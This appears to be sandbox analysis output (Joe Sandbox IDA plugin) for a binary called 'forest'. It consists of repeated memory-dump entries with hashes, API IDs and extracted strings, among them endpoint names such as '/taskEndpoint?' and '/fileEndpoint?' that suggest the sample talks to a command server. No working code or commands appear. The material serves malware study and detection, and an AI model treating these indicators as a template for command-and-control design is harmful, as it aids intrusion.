    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 87f45778ff971aba7ce3f734c2651c6e97fec5afbed90dd1b1c86f56fd86f035
    • Instruction ID: b02aa21b77a6286776d03c01dae9df25bb42057e416eb8b2ce72ddd791d449da
    • Opcode Fuzzy Hash: 87f45778ff971aba7ce3f734c2651c6e97fec5afbed90dd1b1c86f56fd86f035
    • Instruction Fuzzy Hash: 5091E426B087D688FB699F39C4502BCBBA1AF44B88F9C4031DE4D177A5DE3AD841C320
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: 4ad6b9f4432906f135b8dd3c72e53b1a22c067a589a710dc80522fe65d7b5cdb
    • Instruction ID: 9afc6cb1b78d9fc716d5f5903282a753b33181fb260fa7fb132961da23cdd13b
    • Opcode Fuzzy Hash: 4ad6b9f4432906f135b8dd3c72e53b1a22c067a589a710dc80522fe65d7b5cdb
    • Instruction Fuzzy Hash: 9481B072A04B1286EB68AF29D4C577DA361FB44B94F984636EE1E877E4CF3CD0418750
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c85187abf30c5ce538421c33984565d9305ba6d6c58eded8eb0eb882ace783bf
    • Instruction ID: cd9b36b4d77a86f71e3bd17fd01b430b1de6b74e93b97502261becdf9f0ff1c0
    • Opcode Fuzzy Hash: c85187abf30c5ce538421c33984565d9305ba6d6c58eded8eb0eb882ace783bf
    • Instruction Fuzzy Hash: C281E472A08BC146EF68DF1D948137AF690FB8A794FA85235DA9D43BA5CE3DD4008B10
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e00f397ae338938fd8b8a1234f6058bf6b7253c494a8c7dedd4426e63cb650a7
    • Instruction ID: 8c1237c1ff2a30ea7885eb8132881bf2dc486cf6652ef48019f49bde318a54c1
    • Opcode Fuzzy Hash: e00f397ae338938fd8b8a1234f6058bf6b7253c494a8c7dedd4426e63cb650a7
    • Instruction Fuzzy Hash: FE515E72E08B5186E72CAF2CC19423CEBA0EB55B58F590175CE4E577B8CF69E841C7A0
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b2fc44ad14a614332960738f91919508aaa3738b51a3d202a8b17e26d1b4cd2a
    • Instruction ID: 285e4331635a5da0fbfe8fbe5c88817da339b10417111aba325b1be5a13cb259
    • Opcode Fuzzy Hash: b2fc44ad14a614332960738f91919508aaa3738b51a3d202a8b17e26d1b4cd2a
    • Instruction Fuzzy Hash: 1A516D76E08F5282E72CAF2C815827CE7A0EB55B58F990175CA4D177B9CF68EC41C7A0
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ErrorFreeHeapLast
    • String ID:
    • API String ID: 485612231-0
    • Opcode ID: 9c31f07231d4a45a650701019bc74ff76c00fe044c85a6861c68b665763c22ca
    • Instruction ID: 8dc6626a4b0838dff77459e122768ace56091a4e4b952540582e08b3e66abb08
    • Opcode Fuzzy Hash: 9c31f07231d4a45a650701019bc74ff76c00fe044c85a6861c68b665763c22ca
    • Instruction Fuzzy Hash: 01418422714B5541EF48DF6AD965179B3A1BB48FD4B899036EE0D97BA8DE3CD0428304
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d6493d6e35529629c397c204590ddb3bde36fd56b60c7bb670539de328662dbf
    • Instruction ID: fc000b592e189444ca40fdecf6935267b2150a0e80205adb0e0e444d28428999
    • Opcode Fuzzy Hash: d6493d6e35529629c397c204590ddb3bde36fd56b60c7bb670539de328662dbf
    • Instruction Fuzzy Hash: 8E415433B1565487E78CCF39C8656AD73A2F3D9304F89C239EA1AC7395DA3A9905CB40
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 49246b04862395ee029d2994fd82be78ec5b7bbecae9447cd8274b0296db14a3
    • Instruction ID: 2db0e5409555400c851479763312900da578c3d7974c79af19736b0c7e7e3b72
    • Opcode Fuzzy Hash: 49246b04862395ee029d2994fd82be78ec5b7bbecae9447cd8274b0296db14a3
    • Instruction Fuzzy Hash: 3CF068717293958ADB989F2DA81363977E0F708790FC48039D68D83F14D63CD4508F14
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 39c127a8ea53526737e7da6aad63f12c26a1fe1c590eaef1eee70b1f344780ff
    • Instruction ID: 845b3876375c79c3e1a452f260a1638c1364d40b949943bd1eb433ec2143183c
    • Opcode Fuzzy Hash: 39c127a8ea53526737e7da6aad63f12c26a1fe1c590eaef1eee70b1f344780ff
    • Instruction Fuzzy Hash: C2A00221D0CE46D0E74CAB08E854274E730EB60348BD84572E04E42470AFFDA484C320
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a26f83c321bc3db4902087ba860ad409b774afccba67a2f0786e5f7050fbb8d7
    • Instruction ID: a58171afe67c19635fe8895bf35f62bd21f9134f587c83cfe36e6873ef9fb2f7
    • Opcode Fuzzy Hash: a26f83c321bc3db4902087ba860ad409b774afccba67a2f0786e5f7050fbb8d7
    • Instruction Fuzzy Hash: 3411A32195970765E5197729B8F91BBE190EF163A4F981F30FD6D023E38E3CA4A4C610
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: 0$0$0$0
    • API String ID: 3215553584-3558443385
    • Opcode ID: e93bfac5235ef71cd426514e060948761f247dc8953c00dea033de83a4a23df1
    • Instruction ID: 6c52706078630f23a8097788cacbbbb1d28e938c4e7d14d931ec3b98ff7705d0
    • Opcode Fuzzy Hash: e93bfac5235ef71cd426514e060948761f247dc8953c00dea033de83a4a23df1
    • Instruction Fuzzy Hash: E5F1C3369097868AF75AAF1D84C43BDBB91AB11BC8FDC4032C68D477E1DF2DA4658720
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn
    • String ID: invalid stoi argument$stoi argument out of range$type=0
    • API String ID: 3668304517-70522167
    • Opcode ID: a09c7e5c2d23c9f4d4aec673c2591103bbc3faef796065eeb9ac9be67246059b
    • Instruction ID: 05c6de6ae1865b152684428bb1708cf925caf31e401da67e5d4d889d98a5fe6a
    • Opcode Fuzzy Hash: a09c7e5c2d23c9f4d4aec673c2591103bbc3faef796065eeb9ac9be67246059b
    • Instruction Fuzzy Hash: 4271E722F19B4695F714EB79E4403FDA3B1EB44348F884535EE4C16BA9EE38E595C310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: ByteCharMultiWide
    • String ID: /fileEndpoint?$/infoEndpoint?$/taskEndpoint?
    • API String ID: 626452242-4035432986
    • Opcode ID: 6dfd119fe7f24439e64abed31e3f9a06fc0040ed8949a8e682c6a5c46fd5acd1
    • Instruction ID: 222a9e9457642132412711d2509ad5e3f1cc5375abaf3016bb29b2e3fcfba103
    • Opcode Fuzzy Hash: 6dfd119fe7f24439e64abed31e3f9a06fc0040ed8949a8e682c6a5c46fd5acd1
    • Instruction Fuzzy Hash: 3B418E76A09B8182E728AF5AB90417AF7A2F788BD5F484239DE8C17B75DF3CD1418704
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
    • API String ID: 2294326227-1866435925
    • Opcode ID: 86fe1b2093ae2041e83959f1dff7804b2bc232e9e5e410c9bfc820932902e2a8
    • Instruction ID: a52285090aa65750b0c9f74b6bdd07c9eb6badbc2815b0c6af20b70436d01cdc
    • Opcode Fuzzy Hash: 86fe1b2093ae2041e83959f1dff7804b2bc232e9e5e410c9bfc820932902e2a8
    • Instruction Fuzzy Hash: 99915032A09B8581EB28DB19E4513B9B7A0FB84B84F988136DE8D43779DF3DD446C750
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
    • String ID:
    • API String ID: 1330151763-0
    • Opcode ID: 1ff1ce3bc5de2cde991e5a49a17d146b584b1235a50141dcf283e721ad9a4ef4
    • Instruction ID: a5072d6e439ca8593e5a45c252bb44bf1e1c925db1bf40a8b243d4ec38f2641b
    • Opcode Fuzzy Hash: 1ff1ce3bc5de2cde991e5a49a17d146b584b1235a50141dcf283e721ad9a4ef4
    • Instruction Fuzzy Hash: FAC1CE36B28B8685EB18EFA9C4812BC7761E749BA8B490235DA1E573E5DF39E051C310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: 0$f$p$p
    • API String ID: 3215553584-1202675169
    • Opcode ID: 3c7a9cd9be296de5bd08ebe4132baff99b533e7609acdf59f14f58abcc8e45d7
    • Instruction ID: 380ff85ba8bf1e4d03e617d71c3527776888791623d54f33f2a83eabeac4dede
    • Opcode Fuzzy Hash: 3c7a9cd9be296de5bd08ebe4132baff99b533e7609acdf59f14f58abcc8e45d7
    • Instruction Fuzzy Hash: 82128E62A0C34386FB28BF1DD0D467AF652EB50790FDC4035E69A476E4DB3CE5888B21
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
    • String ID: csm$csm$csm
    • API String ID: 849930591-393685449
    • Opcode ID: 85571a4aa4e66ce0910882c431aedcda040aa42fe04e3a167392749960caa1e6
    • Instruction ID: f803b3a953f8c289330b5b126b8d86acfd16c26d685ced7acfa6fb2e642cb7dd
    • Opcode Fuzzy Hash: 85571a4aa4e66ce0910882c431aedcda040aa42fe04e3a167392749960caa1e6
    • Instruction Fuzzy Hash: 2DD1C372E087418AEB68AF68D4402BDB7A0FB45788F880175EE8D57BA5CF79E480C750
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: file=
    • API String ID: 2081738530-2538679502
    • Opcode ID: eb3739b5e1fdbb06f111bd2a254998f898f1234b37b19ab848cda24c27d7c5b4
    • Instruction ID: 2726f4f914e5a8221586271c3b76e81206b8aed5d78a155ebf9fbf2e22e43c90
    • Opcode Fuzzy Hash: eb3739b5e1fdbb06f111bd2a254998f898f1234b37b19ab848cda24c27d7c5b4
    • Instruction Fuzzy Hash: F5416022E09B4681EA1DBB2DE4501B9E360FF84BA0F8C0131DA1D477B5DFBCE4568364
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID: ios_base::failbit set
    • API String ID: 2081738530-3924258884
    • Opcode ID: d0da2b08eec1731dbfd390c5f86d148559b00a4e2dc1bef3708e95ff47e3a863
    • Instruction ID: 8b89eda020e1a939610287df1a9fb394ea842be59e6b3b2844ed1d9b3b4af696
    • Opcode Fuzzy Hash: d0da2b08eec1731dbfd390c5f86d148559b00a4e2dc1bef3708e95ff47e3a863
